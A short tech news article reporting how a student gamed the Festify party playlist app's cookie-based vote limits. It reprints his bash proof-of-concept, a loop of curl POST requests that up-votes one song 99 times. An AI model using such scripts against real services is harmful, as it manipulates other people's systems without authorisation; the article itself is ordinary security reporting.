This article is more than 1 year old
Hacker dominates Festify crowd-pleaser party app
Dutch student Roelof Roos has found a way to hijack his fraternity's parties using popular music player Festify.
Roos resides at the Windesheim University of Applied Sciences' Gumbo Millennium fraternity and detailed how frat folk can capture and warp cookies and POST requests to upvote their music to the top of Festify's community playlists, breaking central control of the app.
Rather than allowing the most popular songs on Spotify to be elected to a current playlist based on votes cast on party-goer smartphones, Roos found he could huddle in the corner and hijack the list so his own music would dominate listings.
"Festify uses cookies to register your vote and prevents you from forcing your music on other people," Roos says.
"After adding a song to the queue you can’t vote on it. But that's easily solved.
"Delete your cookies, hard refresh and then you’re able to up-vote a song you just added. Using Chrome Developer tools you’re able to capture the POST request that up votes the song."
Proof of concept.
Roos showed how party hackers can edit cURL requests to strip cookies and weave into a script.
| #!/bin/bash x=1 while [ $x -le 99 ] do echo "Up-voted $x times"
curl 'http://festify.us/api/parties/57d16e88a27dd0a66ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d16e88a27dd0a66ec' -H 'Connection: keep-alive' --data-binary '{"name":"Afro Circus/I Like To Move It","spotifyID":"0qNBowxGCvy2mSbg9kmEua"}' --compressed x=$(( $x + 1 )) done echo "AFRO" |
|---|
The hacker did not say whether he is banned from further frat parties. ®
Biting the hand that feeds IT
